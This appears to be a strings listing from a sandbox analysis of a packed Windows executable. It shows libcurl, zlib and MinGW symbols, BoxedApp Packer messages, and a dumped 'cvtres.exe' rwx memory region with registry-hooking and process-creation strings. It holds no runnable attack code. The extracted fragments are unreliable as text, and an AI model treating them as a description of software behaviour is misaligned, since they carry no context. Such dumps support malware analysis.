%d</pre><pre>TUNNEL_STATE switched to: %d</pre><pre>Received HTTP code %d from proxy after CONNECT</pre><pre>%s/%s</pre><pre>username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s</pre><pre>00000001</pre><pre>12345678</pre><pre>%s xxxxxxxxxxxxxxxx</pre><pre>- Conn %d (%p) send_pipe: %d, recv_pipe: %d</pre><pre>Server %s is blacklisted</pre><pre>Server %s is not blacklisted</pre><pre>Site %s:%d is pipeline blacklisted</pre><pre>Adding handle: send: %d</pre><pre>Adding handle: recv: %d</pre><pre>Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d</pre><pre>curl_easy_duphandle</pre><pre>curl_easy_escape</pre><pre>curl_easy_getinfo</pre><pre>curl_easy_pause</pre><pre>curl_easy_recv</pre><pre>curl_easy_send</pre><pre>curl_easy_strerror</pre><pre>curl_easy_unescape</pre><pre>curl_escape</pre><pre>curl_formadd</pre><pre>curl_formfree</pre><pre>curl_formget</pre><pre>curl_free</pre><pre>curl_getdate</pre><pre>curl_getenv</pre><pre>curl_global_cleanup</pre><pre>curl_global_init_mem</pre><pre>curl_maprintf</pre><pre>curl_mfprintf</pre><pre>curl_mprintf</pre><pre>curl_msnprintf</pre><pre>curl_msprintf</pre><pre>curl_multi_add_handle</pre><pre>curl_multi_assign</pre><pre>curl_multi_cleanup</pre><pre>curl_multi_fdset</pre><pre>curl_multi_info_read</pre><pre>curl_multi_init</pre><pre>curl_multi_perform</pre><pre>curl_multi_remove_handle</pre><pre>curl_multi_setopt</pre><pre>curl_multi_socket</pre><pre>curl_multi_socket_action</pre><pre>curl_multi_socket_all</pre><pre>curl_multi_strerror</pre><pre>curl_multi_timeout</pre><pre>curl_multi_wait</pre><pre>curl_mvaprintf</pre><pre>curl_mvfprintf</pre><pre>curl_mvprintf</pre><pre>curl_mvsnprintf</pre><pre>curl_mvsprintf</pre><pre>curl_share_cleanup</pre><pre>curl_share_init</pre><pre>curl_share_setopt</pre><pre>curl_share_strerror</pre><pre>curl_strequal</pre><pre>curl_strnequal</pre><pre>curl_unescape</pre><pre>curl_version_info</pre><pre>ADVAPI32.DLL</pre><pre>WS2_32.DLL</pre><pre>zlib1.dll</pre><pre>8 8$8(8,808</pre><pre>2 2$2(2,2024282</pre><pre>DllMainCRTStartup</pre><pre>GNU C 4.2.1-sjlj (mingw32-2)</pre><pre>/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c</pre><pre> DllMainCRTStartup@12</pre><pre>dllcrt1.c</pre><pre>.file</pre><pre>http.c</pre><pre>ftp.c</pre><pre>url.c</pre><pre>_Curl_do</pre><pre>curl_fnmatch.c</pre><pre>ftplistparser.c</pre><pre>http_chunks.c</pre><pre>http_digest.c</pre><pre>curl_rand.c</pre><pre>http_negotiate.c</pre><pre>tftp.c</pre><pre>ssh.c</pre><pre>curl_addrinfo.c</pre><pre>curl_sspi.c</pre><pre>curl_memrchr.c</pre><pre>smtp.c</pre><pre>curl_threads.c</pre><pre>curl_rtmp.c</pre><pre>curl_gethostname.c</pre><pre>http_proxy.c</pre><pre>curl_gssapi.c</pre><pre>curl_ntlm.c</pre><pre>curl_ntlm_wb.c</pre><pre>curl_ntlm_core.c</pre><pre>curl_ntlm_msgs.c</pre><pre>curl_sasl.c</pre><pre>curl_schannel.c</pre><pre>curl_multibyte.c</pre><pre>curl_darwinssl.c</pre><pre>pipeline.c</pre><pre>.idata$7</pre><pre>.idata$5</pre><pre>.idata$48</pre><pre>.idata$6</pre><pre>.idata$4(</pre><pre>.idata$4,</pre><pre>.idata$44</pre><pre>.idata$40</pre><pre>.idata$4</pre><pre>.idata$7`</pre><pre>.idata$7\</pre><pre>.idata$7l</pre><pre>.idata$4</pre><pre>.idata$7x</pre><pre>.idata$6|</pre><pre>.idata$6T</pre><pre>.idata$7|</pre><pre>.idata$7d</pre><pre>.idata$7t</pre><pre>.idata$6d</pre><pre>.idata$6D</pre><pre>.idata$64</pre><pre>.idata$7h</pre><pre>.idata$7p</pre><pre>.idata$6l</pre><pre>.idata$6$</pre><pre>.idata$2P</pre><pre>.idata$5|</pre><pre>.idata$4$</pre><pre>.idata$6(</pre><pre>.idata$6P</pre><pre>.idata$60</pre><pre>.idata$68</pre><pre>.idata$2(</pre><pre>.idata$4`</pre><pre>.idata$6h</pre><pre>.idata$4L</pre><pre>.idata$6\</pre><pre>.idata$5@</pre><pre>.idata$7(</pre><pre>.idata$5P</pre><pre>.idata$7H</pre><pre>.idata$5p</pre><pre>.idata$6t</pre><pre>.idata$7D</pre><pre>.idata$5l</pre><pre>.idata$5<</pre><pre>.idata$4@</pre><pre>.idata$4H</pre><pre>.idata$6,</pre><pre>.idata$5</pre><pre>.idata$4l</pre><pre>.idata$4T</pre><pre>.idata$7<</pre><pre>.idata$5d</pre><pre>.idata$74</pre><pre>.idata$5\</pre><pre>.idata$6<</pre><pre>.idata$4<</pre><pre>.idata$5D</pre><pre>.idata$7,</pre><pre>.idata$5T</pre><pre>.idata$5,</pre><pre>.idata$4x</pre><pre>.idata$5$</pre><pre>.idata$4p</pre><pre>.idata$78</pre><pre>.idata$5`</pre><pre>.idata$6H</pre><pre>.idata$4h</pre><pre>.idata$5(</pre><pre>.idata$4t</pre><pre>.idata$7</pre><pre>.idata$5H</pre><pre>.idata$7@</pre><pre>.idata$5h</pre><pre>.idata$6`</pre><pre>.idata$70</pre><pre>.idata$5X</pre><pre>.idata$4X</pre><pre>.idata$58</pre><pre>.idata$4D</pre><pre>.idata$4P</pre><pre>.idata$50</pre><pre>.idata$4|</pre><pre>.idata$7$</pre><pre>.idata$5L</pre><pre>.idata$4\</pre><pre>.idata$4d</pre><pre>.idata$7L</pre><pre>.idata$5t</pre><pre>.idata$54</pre><pre>.idata$2<</pre><pre>.idata$5x</pre><pre>.idata$7P</pre><pre>.idata$6p</pre><pre>.idata$7T</pre><pre>.idata$2</pre><pre>.idata$7X</pre><pre>.idata$6X</pre><pre>.idata$6</pre><pre>.idata$2d</pre><pre>.debug_aranges</pre><pre>.debug_pubnames</pre><pre>.debug_info</pre><pre>.debug_abbrev</pre><pre>.debug_line</pre><pre>.debug_frame</pre><pre>.debug_loc</pre><pre>_DllMainCRTStartup@12</pre><pre>_curlx_tvdiff</pre><pre>_curlx_tvdiff_secs</pre><pre>_Curl_tvlong</pre><pre>_curlx_tvnow</pre><pre>_Curl_base64_encode</pre><pre>_Curl_base64_decode</pre><pre>_Curl_num_addresses</pre><pre>_Curl_resolv_unlock</pre><pre>_Curl_hostcache_clean</pre><pre>_Curl_hostcache_destroy</pre><pre>_Curl_mk_dnscache</pre><pre>_Curl_hostcache_prune</pre><pre>_Curl_cache_addr</pre><pre>_Curl_loadhostpairs</pre><pre>_Curl_resolv</pre><pre>_Curl_resolv_timeout</pre><pre>_Curl_printable_address</pre><pre>_Curl_global_host_cache_dtor</pre><pre>_Curl_global_host_cache_init</pre><pre>_Curl_pgrsSetDownloadCounter</pre><pre>_Curl_pgrsSetUploadCounter</pre><pre>_Curl_pgrsSetDownloadSize</pre><pre>_Curl_pgrsSetUploadSize</pre><pre>_Curl_pgrsResetTimesSizes</pre><pre>_Curl_pgrsStartNow</pre><pre>_Curl_pgrsUpdate</pre><pre>_Curl_pgrsDone</pre><pre>_Curl_pgrsTime</pre><pre>_Curl_formclean</pre><pre>_curl_formfree</pre><pre>_Curl_FormInit</pre><pre>_Curl_formpostheader</pre><pre>_Curl_FormReader</pre><pre>_Curl_getformdata</pre><pre>_curl_formget</pre><pre>_curl_formadd</pre><pre>_Curl_cookie_freelist</pre><pre>_Curl_cookie_clearall</pre><pre>_Curl_cookie_clearsess</pre><pre>_Curl_cookie_cleanup</pre><pre>_Curl_cookie_list</pre><pre>_Curl_cookie_getlist</pre><pre>_Curl_cookie_add</pre><pre>_Curl_cookie_init</pre><pre>_Curl_cookie_loadfiles</pre><pre>_Curl_flush_cookies</pre><pre>_http_should_fail</pre><pre>_Curl_add_buffer_init</pre><pre>_http_getsock_do</pre><pre>_use_http_1_1</pre><pre>_Curl_add_buffer</pre><pre>_checkhttpprefix</pre><pre>_Curl_checkheaders</pre><pre>_Curl_compareheader</pre><pre>_http_perhapsrewind</pre><pre>_Curl_http_auth_act</pre><pre>_Curl_http_done</pre><pre>_Curl_http_connect</pre><pre>_Curl_add_bufferf</pre><pre>_Curl_add_timecondition</pre><pre>_Curl_add_custom_headers</pre><pre>_Curl_add_buffer_send</pre><pre>_Curl_http_input_auth</pre><pre>_Curl_http_output_auth</pre><pre>_Curl_http</pre><pre>_Curl_http_readwrite_headers</pre><pre>_Curl_write</pre><pre>_Curl_debug</pre><pre>_Curl_read</pre><pre>_Curl_read_plain</pre><pre>_Curl_sendf</pre><pre>_Curl_failf</pre><pre>_Curl_client_write</pre><pre>_Curl_recv_plain</pre><pre>_Curl_send_plain</pre><pre>_Curl_write_plain</pre><pre>_Curl_infof</pre><pre>_Curl_freeset</pre><pre>_Curl_init_userdefined</pre><pre>_Curl_protocol_getsock</pre><pre>_Curl_doing_getsock</pre><pre>_Curl_protocol_connecting</pre><pre>_Curl_protocol_doing</pre><pre>_Curl_reset_reqproto</pre><pre>_Curl_do_more</pre><pre>_Curl_verboseconnect</pre><pre>_Curl_isPipeliningEnabled</pre><pre>_IsPipeliningPossible</pre><pre>_parse_remote_port</pre><pre>_Curl_open</pre><pre>_Curl_protocol_connect</pre><pre>_Curl_connected_proxy</pre><pre>_Curl_setup_conn</pre><pre>_Curl_removeHandleFromPipeline</pre><pre>_Curl_getoff_all_pipelines</pre><pre>_Curl_addHandleToPipeline</pre><pre>_signalPipeClose</pre><pre>_Curl_disconnect</pre><pre>_Curl_done</pre><pre>_Curl_handler_dummy</pre><pre>_Curl_connect</pre><pre>_Curl_setopt</pre><pre>_Curl_close</pre><pre>_Curl_dupset</pre><pre>_Curl_if_is_interface_name</pre><pre>_Curl_if2ip</pre><pre>_Curl_speedcheck</pre><pre>_Curl_speedinit</pre><pre>_curl_version_info</pre><pre>_curl_version</pre><pre>_curl_getenv</pre><pre>_curl_free</pre><pre>_Curl_urldecode</pre><pre>_curl_easy_unescape</pre><pre>_curl_unescape</pre><pre>_curl_easy_escape</pre><pre>_curl_escape</pre><pre>_curl_msnprintf</pre><pre>_curl_mvfprintf</pre><pre>_curl_mvprintf</pre><pre>_curl_mvsprintf</pre><pre>_curl_mfprintf</pre><pre>_curl_mprintf</pre><pre>_curl_msprintf</pre><pre>_curl_mvaprintf</pre><pre>_curl_maprintf</pre><pre>_curl_mvsnprintf</pre><pre>_Curl_parsenetrc</pre><pre>_Curl_initinfo</pre><pre>_Curl_getinfo</pre><pre>_Curl_single_getsock</pre><pre>_Curl_sleep_time</pre><pre>_Curl_posttransfer</pre><pre>_strlen_url</pre><pre>_strcpy_url</pre><pre>_Curl_setup_transfer</pre><pre>_Curl_meets_timecondition</pre><pre>_Curl_reconnect_request</pre><pre>_Curl_follow</pre><pre>_Curl_pretransfer</pre><pre>_Curl_readrewind</pre><pre>_Curl_retry_request</pre><pre>_Curl_fillreadbuffer</pre><pre>_Curl_readwrite</pre><pre>_curl_strnequal</pre><pre>_curl_strequal</pre><pre>_Curl_easy_addmulti</pre><pre>_curl_easy_send</pre><pre>_curl_easy_recv</pre><pre>_curl_easy_pause</pre><pre>_Curl_easy_initHandleData</pre><pre>_curl_easy_reset</pre><pre>_curl_easy_duphandle</pre><pre>_curl_easy_getinfo</pre><pre>_curl_easy_cleanup</pre><pre>_curl_easy_perform</pre><pre>_curl_easy_setopt</pre><pre>_curl_global_cleanup</pre><pre>_curl_global_init</pre><pre>_curl_easy_init</pre><pre>_curl_global_init_mem</pre><pre>_Curl_fnmatch</pre><pre>_Curl_fileinfo_dtor</pre><pre>_Curl_fileinfo_alloc</pre><pre>_Curl_wildcard_dtor</pre><pre>_Curl_wildcard_init</pre><pre>_Curl_httpchunk_init</pre><pre>_Curl_httpchunk_read</pre><pre>_Curl_strtok_r</pre><pre>_Curl_persistconninfo</pre><pre>_Curl_socket</pre><pre>_Curl_closesocket</pre><pre>_Curl_getconnectinfo</pre><pre>_Curl_timeleft</pre><pre>_Curl_sndbufset</pre><pre>_Curl_connecthost</pre><pre>_Curl_updateconninfo</pre><pre>_Curl_is_connected</pre><pre>_Curl_llist_alloc</pre><pre>_Curl_llist_insert_next</pre><pre>_Curl_llist_remove</pre><pre>_Curl_llist_destroy</pre><pre>_Curl_llist_count</pre><pre>_Curl_llist_move</pre><pre>_Curl_hash_pick</pre><pre>_Curl_hash_str</pre><pre>_Curl_hash_start_iterate</pre><pre>_Curl_hash_next_element</pre><pre>_Curl_str_key_compare</pre><pre>_Curl_hash_clean_with_criterium</pre><pre>_Curl_hash_delete</pre><pre>_Curl_hash_clean</pre><pre>_Curl_hash_destroy</pre><pre>_Curl_hash_add</pre><pre>_Curl_hash_init</pre><pre>_Curl_hash_alloc</pre><pre>_fd_key_compare</pre><pre>_multi_freeamsg</pre><pre>_Curl_multi_pipeline_enabled</pre><pre>_Curl_multi_handlePipeBreak</pre><pre>_Curl_multi_set_easy_connection</pre><pre>_Curl_multi_max_host_connections</pre><pre>_Curl_multi_max_total_connections</pre><pre>_Curl_multi_max_pipeline_length</pre><pre>_Curl_multi_content_length_penalty_size</pre><pre>_Curl_multi_chunk_length_penalty_size</pre><pre>_Curl_multi_pipelining_site_bl</pre><pre>_Curl_multi_pipelining_server_bl</pre><pre>_curl_multi_assign</pre><pre>_Curl_expire</pre><pre>_Curl_multi_process_pending_handles</pre><pre>_curl_multi_timeout</pre><pre>_curl_multi_fdset</pre><pre>_curl_multi_setopt</pre><pre>_curl_multi_info_read</pre><pre>_curl_multi_cleanup</pre><pre>_curl_multi_perform</pre><pre>_curl_multi_socket_all</pre><pre>_curl_multi_socket_action</pre><pre>_curl_multi_socket</pre><pre>_curl_multi_wait</pre><pre>_curl_multi_remove_handle</pre><pre>_curl_multi_add_handle</pre><pre>_curl_multi_init</pre><pre>_Curl_unencode_cleanup</pre><pre>_Curl_unencode_gzip_write</pre><pre>_Curl_unencode_deflate_write</pre><pre>_curl_share_init</pre><pre>_Curl_share_lock</pre><pre>_Curl_share_unlock</pre><pre>_curl_share_cleanup</pre><pre>_curl_share_setopt</pre><pre>_Curl_digest_cleanup</pre><pre>_Curl_output_digest</pre><pre>_Curl_input_digest</pre><pre>_Curl_MD5_init</pre><pre>_Curl_MD5_update</pre><pre>_Curl_MD5_final</pre><pre>_Curl_md5it</pre><pre>_Curl_rand</pre><pre>_Curl_srand</pre><pre>_Curl_inet_pton</pre><pre>_curl_easy_strerror</pre><pre>_curl_multi_strerror</pre><pre>_curl_share_strerror</pre><pre>_Curl_strerror</pre><pre>_Curl_ipvalid</pre><pre>_Curl_ipv4_resolve_r</pre><pre>_Curl_getaddrinfo</pre><pre>_Curl_set_dns_servers</pre><pre>_Curl_inet_ntop</pre><pre>_Curl_gmtime</pre><pre>_curl_getdate</pre><pre>_Curl_wait_ms</pre><pre>_Curl_poll</pre><pre>_Curl_socket_check</pre><pre>_Curl_clone_ssl_config</pre><pre>_Curl_free_ssl_config</pre><pre>_Curl_ssl_config_matches</pre><pre>_Curl_splay</pre><pre>_Curl_splayinsert</pre><pre>_KEY_NOTUSED.17658</pre><pre>_Curl_splaygetbest</pre><pre>_Curl_splayremovebyaddr</pre><pre>_Curl_blockread_all</pre><pre>_Curl_SOCKS5</pre><pre>_Curl_SOCKS4</pre><pre>_Curl_raw_toupper</pre><pre>_Curl_raw_equal</pre><pre>_Curl_raw_nequal</pre><pre>_Curl_strntoupper</pre><pre>_Curl_freeaddrinfo</pre><pre>_Curl_he2ai</pre><pre>_Curl_ip2addr</pre><pre>_Curl_str2addr</pre><pre>_curl_slist_append</pre><pre>_curl_slist_free_all</pre><pre>_Curl_slist_duplicate</pre><pre>_curlx_nonblock</pre><pre>_Curl_memrchr</pre><pre>_curlx_ultous</pre><pre>_curlx_ultouc</pre><pre>_curlx_ultosi</pre><pre>_curlx_uztosi</pre><pre>_curlx_uztoul</pre><pre>_curlx_uztoui</pre><pre>_curlx_sltosi</pre><pre>_curlx_sltoui</pre><pre>_curlx_sltous</pre><pre>_curlx_uztosz</pre><pre>_curlx_sotouz</pre><pre>_curlx_sztosi</pre><pre>_curlx_sitouz</pre><pre>_curlx_sktosi</pre><pre>_curlx_sitosk</pre><pre>_Curl_HMAC_init</pre><pre>_Curl_HMAC_update</pre><pre>_Curl_HMAC_final</pre><pre>_Curl_gethostname</pre><pre>http_negotiate_sspi.c</pre><pre>_Curl_proxyCONNECT</pre><pre>_Curl_proxy_connect</pre><pre>_Curl_sasl_cleanup</pre><pre>_Curl_sasl_create_login_message</pre><pre>_sasl_digest_get_key_value</pre><pre>_Curl_sasl_create_digest_md5_message</pre><pre>_Curl_sasl_create_cram_md5_message</pre><pre>_Curl_sasl_create_plain_message</pre><pre>_Curl_bundle_remove_conn</pre><pre>_Curl_bundle_add_conn</pre><pre>_Curl_bundle_destroy</pre><pre>_Curl_bundle_create</pre><pre>_Curl_conncache_find_first_connection</pre><pre>_Curl_conncache_foreach</pre><pre>_Curl_conncache_remove_conn</pre><pre>_Curl_conncache_find_bundle</pre><pre>_Curl_conncache_add_conn</pre><pre>_Curl_conncache_destroy</pre><pre>_Curl_conncache_init</pre><pre>_print_pipeline</pre><pre>_Curl_pipeline_set_server_blacklist</pre><pre>_Curl_pipeline_server_blacklisted</pre><pre>_Curl_pipeline_set_site_blacklist</pre><pre>_Curl_pipeline_site_blacklisted</pre><pre>_Curl_move_handle_from_send_to_recv_pipe</pre><pre>_Curl_add_handle_to_pipeline</pre><pre>_Curl_pipeline_penalized</pre><pre>.weak.__Jv_RegisterClasses.___gcc_register_frame</pre><pre>__libmsvcrt_a_iname</pre><pre>_Curl_handler_http</pre><pre>___crt_xl_start__</pre><pre>___crt_xi_start__</pre><pre>___crt_xi_end__</pre><pre>_Curl_crealloc</pre><pre>_Curl_cfree</pre><pre>_Curl_HMAC_MD5</pre><pre>_Curl_wkday</pre><pre>___crt_xp_start__</pre><pre>_Curl_handler_file</pre><pre>___crt_xp_end__</pre><pre>__head_libmsvcrt_a</pre><pre>_Curl_ccalloc</pre><pre>___crt_xc_end__</pre><pre>___crt_xc_start__</pre><pre>_Curl_DIGEST_MD5</pre><pre>_Curl_cmalloc</pre><pre>_Curl_month</pre><pre>_Curl_cstrdup</pre><pre>___crt_xt_start__</pre><pre>_Curl_cwcsdup</pre><pre>___crt_xt_end__</pre><pre>_Curl_ack_eintr</pre><pre>0`.data</pre><pre>0@.bss</pre><pre>%XQIb</pre><pre>%dQIb</pre><pre>%DQIb</pre><pre>%xQIb</pre><pre>libgcc_s_dw2-1.dll</pre><pre>\QUSEREX.DLL</pre><pre>pthread_key_create</pre><pre>pthread_key_delete</pre><pre>7(8.898?8</pre><pre>_CRT_MT</pre><pre>___w64_mingwthr_add_key_dtor</pre><pre>___w64_mingwthr_remove_key_dtor</pre><pre>__mingwthr_key_t</pre><pre>__mingwthr_key</pre><pre>GNU C 4.5.2</pre><pre>../mingw/dllcrt1.c</pre><pre>C:\MinGW\msys\1.0\src\mingwrt</pre><pre>-DllMainCRTStartup@12</pre><pre>__report_error</pre><pre>../mingw/crtst.c</pre><pre>__mingwthr_run_key_dtors</pre><pre>keyp</pre><pre>new_key</pre><pre>prev_key</pre><pre>cur_key</pre><pre>key_dtor_list</pre><pre>c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include</pre><pre>crtst.c</pre><pre>cygming-crtbegin.c</pre><pre>.tls$AAA</pre><pre>.tls$ZZZ</pre><pre>.CRT$XLA</pre><pre>.CRT$XLZ</pre><pre>.CRT$XLC</pre><pre>.CRT$XLD</pre><pre>.CRT$XDA</pre><pre>.CRT$XDZ</pre><pre>.idata$6N</pre><pre>.idata$6j</pre><pre>.idata$62</pre><pre>.idata$6V</pre><pre>.idata$6~</pre><pre>.idata$6*</pre><pre>.idata$6f</pre><pre>.idata$6@</pre><pre>.idata$6></pre><pre>cygming-crtend.c</pre><pre>__CRT_MT</pre><pre>.eh_frame</pre><pre>.debug_pubtypes</pre><pre>.debug_str</pre><pre>.debug_ranges</pre><pre>_pthread_key_create</pre><pre>_pthread_key_delete</pre><pre>_ptw32_processTerminate.part.1</pre><pre>_pthread_join</pre><pre>___report_error</pre><pre>___mingwthr_run_key_dtors</pre><pre>_key_dtor_list</pre><pre>____w64_mingwthr_add_key_dtor</pre><pre>____w64_mingwthr_remove_key_dtor</pre><pre>.text.startup</pre><pre>.ctors.65535</pre><pre>.weak.___register_frame_info.___gcc_register_frame</pre><pre>_ptw32_selfThreadKey</pre><pre>_ptw32_cleanupKey</pre><pre>.weak.___deregister_frame_info.___gcc_register_frame</pre><pre>deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler</pre><pre>b<fd:%d></fd:%d></pre><pre>inflate 1.2.8 Copyright 1995-2013 Mark Adler</pre><pre>%9X9i9z9</pre><pre>"@"@"@"@</pre><pre>This EXE is created by the demo version of BoxedApp Packer</pre><pre>Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html</pre><pre>WBoxedAppLog_%d.txt</pre><pre>BoxedAppVar:ExeFileName</pre><pre>BoxedAppVar:ExeFileExtension</pre><pre>BoxedAppVar:ExeFileNameWithoutExtension</pre><pre>BoxedAppVar:ExeFullPath</pre><pre>BoxedAppVar:OldCmdLine</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>HKEY_USERS</pre><pre>%s\%s</pre><pre>%s\winsxs\tempBxDir\virtualAsm</pre><pre>:\tempManifest.manifest</pre><pre>%s_%.8x_%.8x_%.8x</pre><pre>\KernelBase.dll</pre><pre>\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll</pre><pre>\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll</pre><pre>%d-%d-%p</pre><pre>:\TLSSupport310D39B571B74d36B95451DD240D8758</pre><pre>",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper</pre><pre>\rundll32.exe"</pre><pre>DotNetAppDomainManager.CManagedHost</pre><pre>BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1</pre><pre>DotNetAppDomainManager.CAppDomainManager</pre><pre>.config</pre><pre>.manifest</pre><pre>",BoxedAppSDK_AttachMixedBitnessProcessHelper</pre><pre>Attempt to launch not executable file:</pre><pre>Unable to find appropriate template exe</pre><pre>comdlg32.dll</pre><pre>\dllhost.exe</pre><pre>hh.exe</pre><pre>find.exe</pre><pre>help.exe</pre><pre>winver.exe</pre><pre>regsvr32.exe</pre><pre>dllhost.exe</pre><pre>ntvdm.exe</pre><pre>tcpsvcs.exe</pre><pre>mpr.dll</pre><pre>Wadvapi32.dll</pre><pre>sxs.dll</pre><pre>Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html</pre><pre>%s_%.8x_%.8x</pre><pre>%s_%.8x</pre><pre>boxedapp_msg_process</pre><pre>boxedapp_event_newmsg</pre><pre>boxedapp_msg_global</pre><pre>bxsdk64.dll</pre><pre>:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\</pre><pre>\DosDevices\pipe\</pre><pre>\Device\NamedPipe\</pre><pre>\??\pipe\</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates</pre><pre>publicKeyToken</pre><pre>Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\</pre><pre>!"#$%&'()* ,-./0123456789:;<=>?@</pre><pre>3, 3, 5, 0</pre><pre>BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.</pre><pre>BoxedAppSDK.dll</pre><pre><BoxedAppVar:OldCmdLine></BoxedAppVar:OldCmdLine></pre><pre><ExeDir></ExeDir></pre><pre><ExeDir>\libcurl-4.dll</ExeDir></pre><pre>!"#$%&'()* ,-./0123456789:</pre><pre>pthreadgc2.dll</pre><pre><ExeDir>\pthreadgc2.dll</ExeDir></pre><pre>POSIX Threads for Windows LPGL</pre><pre>2, 9, 1, 0</pre><pre>pthreadGC2.DLL</pre><pre>http://sourceware.org/pthreads-win32/</pre><pre><ExeDir>\zlib1.dll</ExeDir></pre><pre>For more information visit http://www.zlib.net/</pre><b>cvtres.exe_3500_rwx_00B20000_000AE000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>l$D9.tO</pre><pre>FTPSW</pre><pre>uÂ$D</pre><pre><p></p><pre>TryCreateProcessForVirtualEXE, template exe found:</pre><pre>CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtQueryKey, KeyHandle =</pre><pre>CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =</pre><pre>CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x</pre><pre>KernelBase.dll</pre><pre>kernel32.dll</pre><pre>0x%x%x</pre><pre>CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '</pre><pre>CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x</pre><pre>C62E2B35-E4B3-4019-A7C4-F50AC7F78470</pre><pre>CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '</pre><pre>CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtRenameKey, KeyHandle =</pre><pre>BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart</pre><pre>: Can't create process of rundll32.exe, last error 